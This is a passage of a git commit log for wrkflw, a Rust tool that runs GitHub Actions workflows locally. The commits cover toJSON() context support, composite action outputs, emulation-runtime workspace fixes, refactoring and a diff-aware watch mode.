env var quietly slipping past the INTERNAL_KEYS blocklist, plus a
small maintenance wart worth cleaning up while we're still close to
the code.

It turns out that environment.rs also seeds GITHUB_ACTIONS=true
unconditionally, for CI-detection. Real GHA documents that one as a
default runner env var, not as a property of the `github.*` context
— there is no `github.actions`. So the previous blocklist, which
only caught the workflow-command-protocol tempfile paths
(output/env/path/step_summary), was still letting `"actions": "true"`
through. Harmless in value, but exactly the same class of shape
divergence that 53f3dc6 was meant to close.

Add "actions" to the exclusion set so `toJSON(github)` keeps
matching real GHA.

While at it: the inline INTERNAL_KEYS const + strip_prefix +
filter_map chain lived right next to the bare-env arm, which
funnels its runner-internal vars through `is_user_env_var` — one
crate helper, one place to look. Two parallel exclusion lists in
two different scopes, both encoding knowledge about what
environment.rs seeds, is exactly how these things drift apart the
moment someone adds a new runner var. With `secrets` and `matrix`
bare arms coming next, the pattern would only get worse.

Pull the whole strip + lowercase + exclusion pipeline into a single
helper, `github_context_suffix()`, sitting right next to
`is_user_env_var`. Call site becomes a one-liner, the exclusion
list lives on the function it's semantically attached to, and
future authors have one obvious place to update when a new
runner-internal var shows up.

Extend the existing runner-internals test to seed GITHUB_ACTIONS
and assert it doesn't surface as `github.actions`.

* style(evaluator): collapse toJSON(github) closure per rustfmt

Pure whitespace. Newer rustfmt wants the map() call on one line;
pre-fmt version had it split. Not worth arguing with the formatter.
2026-04-18 21:06:05 +05:30
bahdotsh
295b309517 ci: silence new clippy::collapsible_match in TUI event loop
Clippy on main has been failing since the runner picked up Rust
1.95. The collapsible_match lint got stricter and now complains
about every match arm whose body is just `if cond { ... }` —
twelve of those live inside run_tui_event_loop's big
`match KeyCode`.

The "fix" clippy suggests is match guards: `KeyCode::Char(' ')
if cond => { ... }`. Tempting, but wrong. That same match ends
with a `KeyCode::Char(c)` catch-all that pipes keys into log
search. Convert the earlier arms to guarded patterns and every
time a guard fails — space pressed outside tab 0, 'a' while
running, etc. — the key falls through into the log-search
input handler. That's a behavior change dressed up as a
refactor, and not one I want landing under a CI fix.

So just slap `#[allow(clippy::collapsible_match)]` on the
function and move on. Matches the existing convention in
engine.rs for other function-scoped lint allows. If someone
later wants to actually restructure that match, they can do it
as its own change with its own testing.
2026-04-18 19:18:15 +05:30
Gokul
09903569eb feat(evaluator): make toJSON(needs) return nested needs object (#98)
* feat(evaluator): make toJSON(needs) return nested needs object

Same bug that toJSON(steps) had before #97, and toJSON(env) had
before #96: resolve() had no match arm for the bare "needs"
identifier, so it fell through to Null. Anyone trying to dump the
cross-job outputs context got "null" back. Useful.

Build the shape GHA actually provides: each job ID maps to an
object with "outputs" (sub-object) and "result". Merge the key
sets of needs_context and needs_results so a job appears even if
only one of the two has recorded something for it — same
union-of-keys trick as the steps arm.

Omit "result" when no result was recorded, mirroring how steps
omits outcome/conclusion in that case. The only real shape
difference vs. steps is the single "result" string instead of the
(outcome, conclusion) pair.

Tests mirror the toJSON(steps) suite: populated context, empty,
sorted keys, one-sided populations, and special-character
escaping. Also drops "needs" from the lingering TODO comment —
github, secrets, matrix still to go.

* chore(secrets): silence clippy::unnecessary_sort_by in masker

Clippy 1.95 decided that `sort_by(|a, b| b.0.len().cmp(&a.0.len()))`
is an unnecessary dance when `sort_by_key` with `Reverse` says the
same thing in fewer tokens. CI is now `-D warnings`, so this was
the difference between a green build and a red one.

Swap to `sort_by_key(|pair| std::cmp::Reverse(pair.0.len()))`.
Same descending-by-length order, same behavior, clippy goes quiet.
Not a change anyone will miss.
2026-04-18 19:03:41 +05:30
Gokul
dcf0696de7 feat(evaluator): make toJSON(steps) return nested steps object (#97)
* feat(evaluator): make toJSON(steps) return nested steps object

toJSON(steps) has been returning null this whole time, which is
not particularly useful when you're trying to debug a multi-step
workflow and want to dump the full steps context.

The resolve() method had no match arm for bare "steps" — it just
fell through to the catch-all Null. Meanwhile, all the
infrastructure for nested objects (ExprValue::Object, recursive
expr_to_json, sorted pretty-print) was already sitting right
there from the env implementation.

Build the nested structure that GHA provides: each step ID maps
to an object with "outputs" (sub-object), "outcome", and
"conclusion". Union keys from both step_outputs and step_statuses
so we don't silently drop data if a step appears in only one map.

Seven new tests cover the happy path, empty context, sorted keys,
status-without-outputs, outputs-without-status, truthiness, and
special characters.

* style(evaluator): import HashSet at top of expression.rs

Move inline std::collections::HashSet usage to a top-level import
for consistency with HashMap. Apply rustfmt.
2026-04-16 16:12:23 +05:30
Gokul
100ff53167 fix(evaluator): make toJSON(env) return env object instead of null (#96)
* fix(evaluator): make toJSON(env) return env object instead of null

It turns out that `toJSON(env)` has been returning the string "null"
this whole time. The reason is straightforward: `ExprValue` had no
concept of an object — only strings, numbers, booleans, and null.
When the evaluator saw bare `env` (no dot, no property), it fell
through every match arm and landed on the catch-all `Null`. Then
toJSON happily serialized that to "null".

Add an `Object(HashMap<String, ExprValue>)` variant to `ExprValue`.
When `resolve()` encounters bare `env`, it now builds an Object from
env_context, filtering out system-injected keys (GITHUB_*, RUNNER_*,
INPUT_*, WRKFLW_*, CI). The toJSON function serializes Object values
as sorted, pretty-printed JSON to match real GitHub Actions behavior.

* fix(evaluator): clean up toJSON(env) Object variant plumbing

The previous commit added ExprValue::Object and wired it into
resolve() for bare `env` context. It worked, but it had a few
things that were *not great*.

The inline env-var filter (six separate prefix/name checks) was
duplicated knowledge about which vars the executor injects, buried
inside resolve() where nobody would think to update it when a new
internal prefix is added. Extract it into is_user_env_var() so
there's exactly one place to maintain.

The Vec of entries was sorted by key and then collected into a
HashMap, which — in case anyone needs reminding — does not preserve
insertion order. The sort was pure theatre. Remove it; toJSON
already re-sorts via BTreeMap when serializing.

While at it, add a test for the empty-env edge case (all vars are
internal) to make sure we get "{}" and not something surprising.

* fix(evaluator): use proper JSON serialization for toJSON(env) objects

The toJSON() serializer for Object values was using
to_output_string() to convert values before feeding them to
serde_json. That works fine *today* because all env values happen
to be strings, but it means nested objects would serialize as the
hilariously unhelpful "[object Object]" instead of actual JSON.

Switch to a proper expr_to_json() converter that maps ExprValue to
serde_json::Value recursively, so nested objects actually survive
serialization. While at it, stop fully-qualifying HashMap when it's
already imported — that's just noise.

Add a test for the completely-empty env context edge case, because
apparently nobody thought to check what happens when there are
literally zero environment variables.

* docs(evaluator): document is_user_env_var heuristic limitations

The is_user_env_var filter uses prefix matching to separate
user-declared env vars from runner-injected ones, but env_context
is a single flat HashMap that mixes both. This means a user who
writes `env: { GITHUB_CUSTOM: "val" }` gets silently excluded from
toJSON(env) output.

This is not great, but the proper fix — separating user env from
runner env upstream in ExpressionContext — is a larger refactor.
For now, document the limitation so nobody has to rediscover it the
hard way, add a test that pins the current (incorrect) behavior,
and drop a TODO for the other bare contexts (github, secrets,
matrix, steps, needs) that still return null under toJSON().

* fix(evaluator): harden Object variant and is_user_env_var heuristic

The is_user_env_var heuristic was living in blissful isolation from
the code that *actually injects* the internal env vars. If someone
added a new prefix in create_github_context without updating the
filter, internal vars would silently leak into toJSON(env) output
and nobody would know until a user complained.

Add a cross-module test that constructs the full github context and
asserts every single key is filtered by is_user_env_var. If the two
get out of sync, the test will scream. Make is_user_env_var
pub(crate) so the environment module can reach it.

While at it, add an explicit Object arm to expr_cmp instead of
relying on the catch-all — because "it happens to work" is not the
same as "it's correct." Also call out GITHUB_TOKEN in the doc
comment since that's the most likely real-world victim of the
heuristic.

Add tests for fromJSON/toJSON round-trip, special characters in env
values, and Object ordering comparisons.

* fix(evaluator): fix Object string coercion and tidy up review issues

to_output_string() for ExprValue::Object was returning "[object
Object]", which is what JavaScript does but *not* what GitHub Actions
does. GHA coerces objects to their JSON representation in string
contexts (e.g. ${{ env }}), so returning a JS-ism here would silently
produce garbage output for anyone relying on string interpolation of
context objects.

While at it, document the MATRIX_CONTEXT exclusion in is_user_env_var
so nobody has to go hunting for where it's inserted (it's
add_matrix_context() in environment.rs), and rename the misleadingly
named "roundtrip" test to what it actually tests — that
fromJSON(toJSON(env)) produces parseable JSON, not that it does a
true semantic roundtrip.
2026-04-14 16:08:34 +05:30
Gokul
530a709652 fix(executor): populate workflow-level env in expression context (#95)
* fix(executor): populate workflow-level env in expression context

It turns out that `WorkflowDefinition` simply *didn't have* an `env`
field. Serde was silently discarding the workflow-level `env:` block
during YAML deserialization, so `${{ env.GLOBAL_VAR }}` evaluated to
empty string while `$GLOBAL_VAR` in shell commands worked fine —
because the OS environment got the vars, but the expression evaluator
never did.

Job-level and step-level env worked correctly because the `Job` and
`Step` structs both had their `env: HashMap<String, String>` fields.
The workflow-level struct just... didn't. For absolutely no reason.

Add the missing `env` field to `WorkflowDefinition` and merge it into
`env_context` right after `create_github_context()`, before job-level
env is applied. This gives correct precedence: step > job > workflow,
matching GitHub Actions behavior.

* fix(executor): harden workflow-level env precedence and add expression resolution

The previous commit added workflow-level env to the expression
context, but it used insert() which means a workflow that defines
env: { CI: "false" } would *override* the built-in GITHUB_*/CI
variables from create_github_context(). That is not great.

Real GitHub Actions never lets workflow env stomp on runner-provided
builtins. Switch to entry().or_insert() so workflow env only fills
in keys that aren't already set.

While at it, workflow-level env values containing ${{ }} expressions
(e.g. ${{ github.repository }}) were being inserted raw without
resolution. Job and step env both resolve expressions — workflow
env should too. Add the same preprocess_expressions() pass.

Add three tests covering: builtin var protection, workflow-vs-job
precedence, and expression substitution in workflow env values.
2026-04-14 10:11:10 +05:30
Gokul
b711e871f7 fix(executor): propagate composite action outputs back to caller (#94)
* fix(executor): propagate composite action outputs back to caller

It turns out that execute_composite_action() was happily running all
the internal steps of a composite action, correctly tracking their
outputs in composite_step_outputs, and then... just throwing all of
that away. The action.yml `outputs:` section — the whole reason
composite actions *have* a return path — was never read or evaluated.

So ${{ steps.my-composite.outputs.whatever }} always resolved to
empty string. Inputs worked fine. The internal steps ran fine. The
output values were right there in memory. Nobody bothered to connect
the last wire.

Add propagate_composite_outputs() which reads the action's outputs
section after the step loop, evaluates each value expression against
the composite's internal step context, and writes the results to the
caller's GITHUB_OUTPUT file. The existing apply_step_environment_updates
pipeline then picks them up naturally — no changes to StepResult or
process_outcome needed.

Also wire this into the early-return failure path so partial outputs
are still available when a composite step fails.

* fix(executor): pass actual job status to composite output propagation

The previous commit (1119f63) added propagate_composite_outputs()
to resolve composite action outputs and write them to the caller's
GITHUB_OUTPUT file. Good fix, but it hardcoded job_status to
"success" in the ExpressionContext.

It turns out that when a composite step *fails*, record_step_status
has already flipped composite_job_status to "failure" — but the
output propagation on the failure short-circuit path was still
cheerfully telling the expression evaluator everything was fine.
Any output expression using success() or failure() builtins would
evaluate with the wrong answer.

Pass the actual composite_job_status to propagate_composite_outputs
instead of lying about it. While at it, add tests for the failure
path (partial outputs from steps that ran before the failure) and
for referencing steps that never existed (should resolve to empty,
not panic).

* fix(executor): handle multiline values in composite output propagation

It turns out that propagate_composite_outputs was writing *all* values
using simple key=value format, which silently corrupts the
GITHUB_OUTPUT file when a resolved expression contains newlines. The
second line onward becomes unparseable garbage, and downstream steps
quietly get empty outputs.

This is not great, especially since parse_github_kv_file already
supports the heredoc format (key<<EOF\nvalue\nEOF) on the read side.
The writer just never bothered to emit it.

Switch to heredoc format when the value contains '\n', and log a
debug diagnostic when the GITHUB_OUTPUT file can't be opened instead
of silently swallowing the error. Add a round-trip test that verifies
multiline values survive the write-then-parse cycle.

* fix(executor): use unique heredoc delimiter and handle write errors in composite output propagation

The heredoc format for multiline composite outputs was using a
hardcoded "EOF" delimiter. If an output value happened to contain
a line that was literally "EOF", parse_github_kv_file would
prematurely terminate the heredoc and silently truncate the value.
This is not great.

On top of that, every write!() call was discarding its Result with
`let _ = ...`, so a partial I/O failure would produce a corrupt
GITHUB_OUTPUT file that the caller would happily misparse.

Replace the hardcoded delimiter with generate_heredoc_delimiter(),
which starts with "ghadelimiter" and appends _1, _2, etc. until
it finds one that doesn't collide with any line in the value. This
matches what real GitHub Actions does (they use UUIDs, but the
principle is the same). Chain the writes with and_then() so the
first failure logs a debug message and breaks out of the loop.

While at it, add tests for delimiter collision and the delimiter
generator itself.

* .gitignore
2026-04-13 15:06:43 +05:30
Gokul
a668d815c4 fix: artifact actions under --runtime emulation (#93)
* test(executor): cover run-step → upload/download-artifact handoff under emulation

Drive a real EmulationRuntime through execute_step for three steps (run,
upload-artifact, download-artifact) and assert the payload round-trips
byte-for-byte. Reproduces #88: today the run step writes via the
GITHUB_WORKSPACE reroute while upload reads ctx.working_dir, so the two
workspaces diverge and the upload fails with "No files found matching
pattern".

Test is intentionally failing at this commit; the fix follows.

* runtime(container): add resolve_host_working_dir helper

Introduces a pure function that rebases a container-visible working
directory onto its host-side volume source by finding the longest
component-boundary prefix in the volumes list and grafting the suffix.

This is the building block for making non-container runtimes
(emulation, secure_emulation) honor the same mount semantics as docker,
so a run: step and an artifact handler observe the same host workspace
(fix for #88). The helper itself is pure and pub(crate); wiring follows
in the next commit.

Component-boundary matching (via Path::strip_prefix) ensures
/github/workspace-foo is not matched by a /github/workspace mount.

* fix(runtime): emulation honors volume mounts for working dir (#88)

EmulationRuntime::run_container now rebases a container-visible
working directory onto its host-side volume source via
resolve_host_working_dir, matching the mount semantics docker already
provides. The old GITHUB_WORKSPACE / CI_PROJECT_DIR reroute is gone:
the volumes parameter is authoritative, and calling with a container
path that no volume covers is now a hard error instead of a silent
substitution.

This makes `run:` steps and artifact/cache handlers observe the same
host workspace, fixing the reported symptom where upload-artifact
returned "No files found matching pattern" because the run step had
written through the reroute to the real project directory while the
upload was searching the per-job tempdir.

Also adjust the #88 regression test to use a glob pattern compatible
with the `glob` crate's handling of trailing `**` (which matches zero
components in that position). The pattern quirk is orthogonal to #88;
tracking fixing artifact glob semantics separately.

* fix(runtime): secure_emulation honors volume mounts; sandbox runs in-place (#88)

Brings SecureEmulationRuntime and the Sandbox under the same mount
contract as EmulationRuntime and docker: a container-visible working
dir is rebased via `resolve_host_working_dir` onto its host-side volume
source, and the command is executed directly in that host path.

The Sandbox used to copy files into its own private workspace and run
there, so nothing the caller's `run:` step wrote was visible to any
subsequent artifact/cache handler — the same #88 symptom that hit
plain emulation, just via a different mechanism. The copy dance was
also not a meaningful security layer; validation comes from
`validate_command` (command whitelist, dangerous patterns) and
`is_env_var_safe` (env filtering), which still run.

Removed: Sandbox::setup_sandbox_environment, copy_safe_files,
is_path_allowed, should_skip_file, should_skip_directory, and the
`workspace: TempDir` field. Removed the file-filtering test that
covered only the deleted copy path. Added two targeted tests for the
new rebase behavior and the error-when-no-volume-covers path.

Uncovered container working dirs now fail loudly with
"not covered by any volume mount" instead of silently running in an
incorrect location.

* refactor(runtime): centralize rebase helper and tighten semantics

PR #93 landed the #88 fix, but review pointed out three things
I'd missed, and they're the kind that turn into the next bug
report if you leave them alone.

First: both EmulationRuntime and SecureEmulationRuntime did
`if working_dir.exists() { use it } else { rebase via volumes }`.
That's the wrong way around. If a dev happens to have a real
`/github/workspace` directory on their host — containerized dev
env, weird NFS mount, somebody being creative — the short-circuit
silently skips the rebase and we're right back to two workspaces
disagreeing about where files live. The whole point of the #88
fix is that the volume mapping is *authoritative*. Flipping the
branch order makes it actually authoritative: the volume wins
first, and we only fall back to \`working_dir\` as-is when no
volume claims it.

Second: ~50 lines of near-identical rebase + create_dir_all +
log + error boilerplate sat duplicated in two runtimes. The next
fix would get applied to one file and not the other. Extracted
into a single \`rebase_working_dir_or_error\` helper in
container.rs. Both call sites collapse to one line.

Third: SandboxConfig was still carrying \`allowed_read_paths\` and
\`allowed_write_paths\` fields that nothing reads. The old
\`is_path_allowed\` that used to check them is gone. Leaving dead
fields on a type named \`Sandbox\` is worse than removing them — a
reader a year from now will assume they're enforced and ship
something based on that assumption. Please don't do that.
Deleted them, along with the factory code that was still
populating them for no reason.

While at it: documented the \`>=\` tiebreaker in
\`resolve_host_working_dir\` (equal-depth ties only happen on
duplicate volume entries, so first-wins is deliberate, not a
typo), added the matching emulation error test for symmetry
with secure_emulation, added four new unit tests for the helper,
and put a module-level doc comment on SandboxConfig explaining
what the sandbox actually enforces (command validation, not
filesystem isolation).

19/19 runtime tests (up from 14), 333/333 executor tests
including the #88 regression, workspace clippy clean.

* fix(test): skip emulation artifact roundtrip test on Windows

The artifact roundtrip test runs `bash -c "mkdir ... && echo ..."`
through EmulationRuntime, which does `Command::new("bash")`. On
Windows CI runners, this resolves to WSL's `bash.exe` sitting in
`C:\Windows\System32\`, not Git Bash. And since the runner has no
WSL distributions installed, the test blows up with a helpful
"Windows Subsystem for Linux has no installed distributions" and
a link to the Microsoft Store.

The test is inherently Unix-only — it exercises Unix shell commands
on a real EmulationRuntime. Gate it with `cfg(not(target_os =
"windows"))`.

* fix(test): skip secure_emulation rebase test on Windows

Same story as 024a300 — the test runs `pwd` via `sh -c` and then
tries to `canonicalize()` the output. On Windows, `sh` (from MSYS2)
prints a Unix-style path that `std::path::PathBuf::canonicalize()`
has absolutely no idea what to do with.

The rebase logic itself is tested by the pure path-math tests in
container.rs which work fine everywhere. This test is specifically
about the end-to-end sandbox execution path, and that requires a
real Unix `sh`. Skip it on Windows.
2026-04-13 10:51:38 +05:30
Gokul
f4e9f84fc4 refactor(watcher,wrkflw): finish draining god-files into modules (#92)
* refactor(watcher,wrkflw): finish draining god-files into modules

The last round of extractions (event_kind, ignore, paths, setup,
trigger_cache, debouncer, shutdown) already peeled the leaves off
`watcher.rs`, but the orchestration core — the 430-line `run()`
body, the git-state cache, the per-cycle `evaluate_and_execute` —
was still sitting there, interleaved with the struct definitions
and hiding under 2071 lines of mostly-test file. `main.rs` had the
same problem on the CLI side: the `Run` and `Watch` match arms
were long inline blocks, and the `pull_request + no base-branch`
rejection was *literally copy-pasted* between the run arm's
`apply_base_branch` helper and the watch arm's inline block.
Having the same load-bearing error string in two places is not my
idea of redundancy.

Lift the TTL-bounded git-state cache into a new `git_state.rs` as
a proper `GitStateCache` type. The `Mutex<Option<CachedGitState>>`
field on `WorkflowWatcher` was a hint that this wanted its own
home. Move the whole main loop body into a new `reactor.rs`, and
while at it drag `evaluate_and_execute`, `refresh_trigger_cache_async`
and `canonicalize_changed_paths` with it — they're private, nobody
outside the reactor calls them, and leaving them on
`WorkflowWatcher` was just more clutter. Keep a `#[cfg(test)]`
shim for `cached_git_state` because two tests pin staleness
behavior through the method; changing the tests would have been
scope creep.

On the `wrkflw` side, extract `prefilter.rs` (holds
`PrefilterDecision`, `PrefilterRequest`, `run_trigger_prefilter`,
`build_event_context`, `apply_base_branch`,
`effective_strict_filter`, plus the seven prefilter unit tests),
then `run_workflow_cmd.rs` and `watch_cmd.rs` for the two command
bodies. Collapse the duplicated pull_request rejection into a new
shared `validate_event_requires_base_branch` helper so both hosts
render identical diagnostics. That's the whole reason the
prefilter pattern exists — to put the flag-matrix logic in one
testable place — and letting the watch command keep its own copy
was how we got here in the first place.

While at it, fix a silent-skip hole at the top of the reactor
loop. The workflow-rescan failure at the old `watcher.rs:628-637`
was logged at `debug` level, directly under a comment that called
the fallback "the exact silent-skip pattern the rest of this PR
has been plugging." Someone saw the hazard and then muted it.
Bump it to `warning` so a persistently-failing rescan (chmod 000,
flaking NFS mount, missing parent) actually surfaces to the user
instead of leaving them staring at a session-long "0 triggered"
stream. Non-verbose users would otherwise never know their new
workflow file was being ignored.

Numbers: `watcher.rs` 2071 → 1218 (~300 non-test), `main.rs` 2039
→ 937. New files: `git_state.rs` (171), `reactor.rs` (819),
`prefilter.rs` (814), `run_workflow_cmd.rs` (221), `watch_cmd.rs`
(248). Public API unchanged. All 46 watcher tests + 7 prefilter
tests still pass. \`cargo clippy -D warnings\` and \`cargo fmt
--check\` are both clean.

* fix(watcher,wrkflw): address review findings on god-file drain

Three things from the review on the refactor PR, none of them
structural but all three worth fixing before merge.

First, the unified `validate_event_requires_base_branch` helper had
hardcoded "simulating" in both the strict error and the non-strict
warning. Reads fine from `wrkflw run` — the run command *is*
simulating — but `wrkflw watch` is not simulating anything, it's
watching. The old inline watch-arm check used "Watching
pull_request" for a reason, and collapsing both sites onto a
run-flavored literal was a UX regression for watch users. The PR
body also claimed the two sites were "literally copy-pasted"; they
were similar but not textually identical. Reword the helper
host-neutral ("event `pull_request` without --base-branch..."),
drop the "simulating"/"watching" verbs entirely, and pin it with
three new tests: the non-PR passthrough pair, the
`pull_request_target` strict-mode rejection, and a regression pin
that fails the build if either host-specific verb ever sneaks back
in.

Second, the escalation of the per-cycle rescan-failure log from
`debug` to `warning` was the right direction — `debug` was
invisible to non-verbose users staring at a session-long "0
triggered" stream — but the same function wires up
`supervisor_warned_at_threshold` as a one-shot latch right above
the rescan code, and the rescan branch was left unlatched. Under
`chmod 000 .github/workflows` plus active file churn the new
warning would fire on every debounced cycle for the rest of the
session, which is the diagnostic-flood failure mode on the other
side of the silent-skip hole. Same pattern as the supervisor: warn
once per failing spell, reset the latch on the first healthy
rescan, log a matching info line on recovery so the operator sees
the transition.

Third, `SUPERVISOR_WARN_THRESHOLD` and `SUPERVISOR_HARD_CAP` were
declared `pub(crate)` on `watcher.rs` but read only from
`reactor.rs`. Move them next to the loop that enforces them, drag
the compile-time `const _: () = { assert!(...) }` invariant block
along, and leave a breadcrumb in `watcher.rs` so `git blame`
doesn't have to chase it.

46/46 watcher tests pass, prefilter tests go 7 → 10, clippy and
fmt both clean.
2026-04-12 00:14:42 +05:30
Gokul
154df50968 feat: add diff-aware selective execution and watch mode (#91)
* feat: add diff-aware selective execution and watch mode

Add two new crates and CLI capabilities that differentiate wrkflw from act:

- `wrkflw-trigger-filter`: Parses workflow `on:` trigger configs (paths,
  branches, tags filters) and evaluates them against git diff state to
  determine which workflows would actually trigger.

- `wrkflw-watcher`: File system watcher using `notify` crate with
  debouncing that auto-detects changes and re-runs affected workflows.

CLI additions:
- `wrkflw run --diff` uses git diff for trigger-aware execution
- `wrkflw run --event <type>` simulates a specific event type
- `wrkflw run --changed-files <list>` manually specifies changed files
- `wrkflw watch` monitors for changes and runs matching workflows

TUI additions:
- Press `d` to toggle diff-aware trigger filter overlay
- Shows green/gray indicators for which workflows would trigger
- Status bar reflects diff filter state

* fix(trigger-filter,watcher): correct glob semantics and fix watcher polling

The glob matchers in both path_matcher and ref_matcher were using
require_literal_separator: false, which means * happily matches /
in file paths and ref names. That's *not* how GitHub Actions works
— * matches anything except /, and ** is what crosses directory
boundaries. So src/* would incorrectly match src/sub/file.rs.

The test that was supposed to catch this (star_does_not_match_slash)
actually tested src/**/*.rs instead. Sneaky.

Set require_literal_separator: true in both matchers and fix the
test to actually assert the correct behavior.

While at it, fix two issues in the watcher's Debouncer:

The mutex handling was inconsistent — add_event and has_pending
silently swallowed poison, but drain called unwrap() and would
panic. Extract a lock_or_recover() helper that consistently
recovers from poison via into_inner() everywhere.

The main watch loop was busy-polling with a 100ms sleep, which is
wasteful and adds needless latency. Replace it with a
tokio::sync::Notify that fires when add_event inserts a path,
so the loop blocks properly until there's actual work to do.

* fix(trigger-filter): correct filter bypass and evaluate activity types

It turns out that when the event context had no branch (e.g., a tag
push), the branch filter check was simply *skipped*, meaning a
workflow with `branches: [main]` would happily match a tag push.
Same problem with the tag filter. The `if let Some(ref branch)`
guard meant "no branch = pass the filter", which is the exact
opposite of what GitHub Actions does.

The fix inverts the logic: check whether the filter *requires*
branches/tags first, and if the context doesn't have one, fail
immediately. While at it, the `types` field was being dutifully
parsed from YAML into `EventFilter.types` and then completely
ignored during evaluation. A workflow with `pull_request: { types:
[opened] }` would trigger on every PR event regardless. That's not
great. Add `activity_type` to `EventContext` and actually evaluate
it.

Also fix the TUI's `toggle_diff_filter` which was running
synchronous git subprocesses on the render thread — blocking the
entire UI while `git diff` thinks about its life choices. Move the
heavy lifting to `std::thread::spawn`. And replace an O(n²)
`Vec::contains` dedup in `get_changed_files` with a HashSet.

* fix(trigger-filter,watcher,ui): fix TUI blocking, watcher event loss, and dual filtering

Three issues found during review, all stemming from the diff-aware
execution feature introduced in the previous commits.

The TUI's toggle_diff_filter() was calling thread::spawn().join(),
which *blocks the main event loop thread* while git commands and
workflow parsing run. If git is slow (large repo, broken index,
network mount), the entire TUI freezes with no way out. Convert to
a fire-and-forget thread with an mpsc channel — the background
thread sends results, and check_diff_filter_results() polls on each
tick via try_recv(). No blocking, no freezing.

The watcher's main loop had a subtle event loss bug. After
notify.notified().await returns and a (potentially long) workflow
execution completes, any events that accumulated during execution
sit in the debouncer. But the loop goes back to notified().await,
which blocks until the *next* filesystem event — the accumulated
ones are orphaned. Add a has_pending() check before awaiting so we
process the backlog immediately.

The executor had an event_filter field on ExecutionConfig, giving it
trigger evaluation responsibilities that don't belong there. The
watcher already filters externally (correctly), creating two
divergent code paths for the same concern. Remove event_filter from
ExecutionConfig entirely and move trigger evaluation to the call
site in main.rs, where it belongs. The executor should just execute.

* fix(trigger-filter,watcher,ui): eliminate duplicated git logic, fix missing untracked files, and parallelize watcher

It turns out the TUI's evaluate_diff_filter was hand-rolling its
own git commands via std::process::Command instead of reusing the
async helpers in trigger-filter::git. Worse, it was only running
`git diff --name-only HEAD` and *not* including untracked files
via `git ls-files --others`. So newly added files were silently
invisible to the TUI diff filter. Not great.

Add synchronous wrappers (get_changed_files_sync,
get_current_branch_sync, get_current_tag_sync) to
trigger-filter::git, sharing the parsing logic with the async
versions via extracted helpers. The TUI now calls these instead
of maintaining its own parallel universe of git invocations.

While at it, fix three more things:

- The watcher was executing triggered workflows sequentially,
  meaning a slow workflow would block all others and starve
  event processing. Switch to futures::future::join_all for
  concurrent execution.

- The debouncer's drain() was unconditionally sleeping for the
  full debounce duration even when nothing was pending. Now it
  returns immediately when empty and re-checks for new arrivals
  after each sleep window so event bursts settle properly.

- The eval reason messages were useless when filters failed due
  to missing context (no branch, no tag, no activity type). They
  now say *why* the filter couldn't match instead of just dumping
  the pattern list.

* fix(watcher,trigger-filter,ui): fix watcher stalls, unbounded concurrency, and sync API duplication

The watcher had a few problems that would make it miserable to use on
any real-world repository.

First, the notify callback was using blocking_send() on the mpsc
channel, which means when the channel fills up (256 slots), the *OS
filesystem event thread* blocks. That's the kind of thing that makes
your entire watcher stop receiving events. Switched to try_send() —
dropping a duplicate event is fine since the debouncer coalesces
anyway.

Second, the watcher was recursively watching the entire repo root
with no exclusions beyond .git/. On any project with a target/ or
node_modules/ directory, this floods the event channel with thousands
of irrelevant build artifact changes. Added a DEFAULT_IGNORE_DIRS
list that filters at the path-component level.

Third, join_all() on the triggered workflow futures meant *unbounded*
concurrent execution. If 20 workflows trigger simultaneously, that's
20 Docker containers spawning at once. Replaced with
buffer_unordered(4) so we don't eat all available resources.

While at it, a few more cleanups from the review:

- Renamed the misleading on_event callback to on_cycle_complete,
  since it fires *after* execution completes, not on detection.

- Extracted the 170-line evaluate-and-execute loop from run() into
  its own evaluate_and_execute() method.

- Parallelized the two sequential git subprocess calls in
  get_changed_files() with tokio::join!.

- Killed the entire sync API in git.rs (three copy-pasted functions).
  The TUI's evaluate_diff_filter now spins up a lightweight
  current_thread tokio runtime instead of maintaining duplicate sync
  wrappers. Having the same logic in two places with two slightly
  different implementations is not redundancy, it's a bug farm.

- Renamed LogFilterLevel::to_string() to as_str() because shadowing
  the ToString trait with an inherent method is a Clippy lint and
  genuinely confusing.

* fix(trigger-filter,watcher,ui): fix debouncer livelock, dead code, and broken diff base

Three issues found during review, all interconnected:

The debouncer's drain() loop had no upper bound on settle rounds.
If filesystem events arrived faster than the debounce window (e.g.
a large build writing hundreds of files), it would spin forever
comparing pending.len() != count_before. Add a MAX_SETTLE_ROUNDS
cap of 10 so it eventually gives up waiting for silence and just
drains what it has.

The trigger-filter crate exported filter_workflows() and
auto_detect_context() — nice reusable helpers — and then both
state.rs and watcher.rs proceeded to ignore them entirely and
inline their own copies of the same logic. Three copies of "build
EventContext, loop over workflows, evaluate triggers" is not
redundancy, it's a maintenance trap. Refactor both callsites to
actually use the helpers they're sitting next to.

The TUI diff filter was hardcoded to diff against HEAD, which only
shows uncommitted changes. Post-commit, the diff is empty and every
workflow gets filtered out. Add get_default_diff_base() which
checks for uncommitted changes first (uses HEAD), then falls back
to merge-base with main/master, then HEAD~1. The TUI now uses this
via auto_detect_context so it shows meaningful results even after
committing.

While at it, cargo fmt touched eval.rs formatting. No logic change.

* fix(trigger-filter): fix staged file blindness, hardcoded default branch, and dead code

get_changed_files() was running `git diff --name-only HEAD` and
proudly calling that "staged + unstaged changes." It turns out
that command only shows *unstaged* changes. Files sitting in the
index after `git add` were completely invisible to trigger
evaluation. Confusion ensues.

Add a parallel `git diff --cached --name-only <base>` call and
merge its results with the unstaged diff, deduplicating paths.
Now we actually see what the user staged. Novel concept.

get_default_diff_base() had "main" and "master" hardcoded as the
only candidates for the merge-base. Repos using "develop", "trunk",
or literally anything else would silently fall back to HEAD~1,
which is almost certainly wrong. Query `git symbolic-ref
refs/remotes/origin/HEAD` first to detect the *actual* default
branch, then fall back to the hardcoded list.

While at it, remove the dead PatternError variant from
TriggerFilterError — it was never constructed anywhere.

* fix(trigger-filter,watcher,ui): consolidate EventContext, fix fallback crash, and harden watch loop

Three call sites — CLI run, TUI toggle, and the watcher — were each
hand-assembling EventContext with subtly different logic. The CLI
forgot to use auto_detect_context, the watcher skipped untracked
files, and the TUI was the only one doing it right. It was only a
matter of time before these diverged further.

Add context_from_diff_range() and context_from_changed_files() to
trigger-filter and use them everywhere. One place to get it right,
zero places to get it wrong.

The get_default_diff_base() fallback was blindly returning "HEAD~1"
which *explodes* on single-commit repos because there is no parent.
Now we verify HEAD~1 resolves first and fall back to the git empty
tree SHA (4b825dc6...) as the ultimate backstop — which means "all
files are changed" rather than "crash and burn."

While at it:
- Wrap on_cycle_complete in spawn_blocking so a blocking callback
  can't stall the entire watch loop
- Re-collect workflow files each cycle so newly added .yml files
  get picked up without a restart
- Guard rapid 'd' toggle in the TUI against spawning duplicate
